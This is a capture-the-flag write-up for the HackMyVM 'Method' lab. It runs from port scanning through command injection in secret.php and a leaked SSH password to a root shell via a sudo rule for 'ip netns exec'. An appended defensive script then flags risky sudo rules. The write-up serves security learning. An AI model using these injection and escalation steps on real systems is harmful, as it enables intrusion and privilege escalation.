NOTES ABOUT Method

[ 2022-10-23 ] [ HackMyVM / Method ]

Status: Rooted
Skills: Port Scanning, Fuzzing, LFI, Sudo
Tools: nmap, ssh, gobuster, curl, sudo ip

PORT SCANNING

  $ nmap -T4 -sCSV -p- 10.0.2.37

  PORT STATE SERVICE VERSION
  22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
  | ssh-hostkey:
  | 3072 4b:24:34:1f:41:10:88:b7:5a:6a:63:d9:f6:75:26:6f (RSA)
  | 256 52:46:e7:20:68:c1:6f:90:2f:a6:ad:ee:6d:87:e7:28 (ECDSA)
  |_ 256 3f:ce:97:a9:1e:f4:60:f4:0e:71:e7:46:58:28:71:f0 (ED25519)
  80/tcp open http nginx 1.18.0
  |_http-title: Test Page for the Nginx HTTP Server on Fedora
  |_http-server-header: nginx/1.18.0

GETTING IN

  $ gobuster -q dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,htm,php,txt,xml -u http://10.0.2.37 --exclude-length 3690
  /index.htm (Status: 200) [Size: 344]
  /sitemap.xml (Status: 200) [Size: 285]
  /note.txt (Status: 200) [Size: 23]
  /secret.php (Status: 302) [Size: 0] [--> https://images-na.ssl-images-amazon.com/images/I/31YDo0l4ZrL._SX331_BO1,204,203,200_.jpg]

  $ curl 10.0.2.37/sitemap.xml
  <?xml version="1.0" encoding="UTF-8"?>
  <urlset xmlns="https://hackmyvm/sitemap/0.9">
  <url>
  <loc>https://hackmyvm.eu/machines/index.htm?vm=Brain</loc>
  <lastmod>2020-02-13</lastmod>
  <changefreq>monthly</changefreq>
  <priority>0.8</priority>
  </url>
  </urlset>

  $ curl 10.0.2.37/index.htm?vm=Brain
  <h1>It's Hacking Time</h1>
  <img src="hacker.gif" alt="Hacker" height="640" width="640">
  <img hidden="true" src="office.gif" alt="hahahahaha" height="640" width="640">
  <form action="/secret.php" hidden="true" method="GET">
  <input type="text" name="HackMyVM" value="" maxlength="100"><br>
  <input type="submit" value="Submit">
  </form>

  $ curl -X POST 'http://10.0.2.37/secret.php' -d 'HackMyVM=id'
  You Found ME : - (<pre>uid=33(www-data) gid=33(www-data) groups=33(www-data)
  </pre>

ELEVATING PRIVILEGES

  $ curl -X POST 'http://10.0.2.37/secret.php' -d 'HackMyVM=cat secret.php'
  You Found ME : - (<pre><?php
  [...]
  $ok="prakasaka:th3-!llum!n@t0r";
  ?>
  </pre>

  $ ssh prakasaka@10.0.2.37
  prakasaka@10.0.2.37's password:

  prakasaka@method:~$ sudo -l
  Matching Defaults entries for prakasaka on method:
  env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

  User prakasaka may run the following commands on method:
  (!root) NOPASSWD: /bin/bash
  (root) /bin/ip

  prakasaka@method:~$ cat user.txt
  ********************

  prakasaka@method:~$ sudo /bin/ip netns add foo
  prakasaka@method:~$ sudo /bin/ip netns exec foo /bin/bash

  root@method:~# cat root.txt
  ********************
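
As an added check (not part of the original notes), a small audit script that parses `sudo -l` output like the one above and flags rules letting the user run a shell-spawning binary as root; /bin/ip qualifies because `ip netns exec` runs an arbitrary program. The SHELL_SPAWNERS set and the parsing of the runas/tag fields are assumptions made for this illustration.

```python
import re

# Binaries that hand the caller an arbitrary child process when run via sudo
# (the page's /bin/ip does so through `ip netns exec`). This set is an
# assumption for illustration; extend it from your own policy.
SHELL_SPAWNERS = {"ip", "bash", "sh"}

# One `sudo -l` command line: "(runas) [TAG: ...] cmd1, cmd2"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$")

# Constructed sample: the `sudo -l` output from the writeup above.
SAMPLE_SUDO_L = r"""
Matching Defaults entries for prakasaka on method:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User prakasaka may run the following commands on method:
(!root) NOPASSWD: /bin/bash
(root) /bin/ip
"""


def parse_rules(text):
    """Return the command rules listed after the 'User ... may run' header."""
    rules, in_cmds = [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_cmds = True
            continue
        m = RULE_RE.match(line) if in_cmds else None
        if not m:
            continue
        runas = m.group("runas").split(":")[0].strip()   # "(root : root)" -> "root"
        tags = m.group("tags").replace(":", "").split()   # "NOPASSWD: " -> ["NOPASSWD"]
        cmds = [c.strip() for c in m.group("cmds").split(",") if c.strip()]
        rules.append({"runas": runas, "tags": tags, "cmds": cmds})
    return rules


def risky_rules(rules):
    """Rules that let the user run a shell-spawning binary (or ALL) as root."""
    findings = []
    for r in rules:
        if r["runas"] not in ("root", "ALL"):   # negated or non-root runas: skip
            continue
        for cmd in r["cmds"]:
            binary = cmd.split()[0].rsplit("/", 1)[-1]
            if cmd == "ALL" or binary in SHELL_SPAWNERS:
                findings.append((r["runas"], cmd))
    return findings


if __name__ == "__main__":
    for runas, cmd in risky_rules(parse_rules(SAMPLE_SUDO_L)):
        print(f"root shell reachable: ({runas}) {cmd}")
```

Run against a live host with `sudo -l | python3 audit.py` after replacing SAMPLE_SUDO_L with `sys.stdin.read()`; the (!root) bash rule is not flagged because it cannot run as root.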

  root@method:~# init 0
  root@method:~# Connection to 10.0.2.37 closed by remote host.
  Connection to 10.0.2.37 closed.
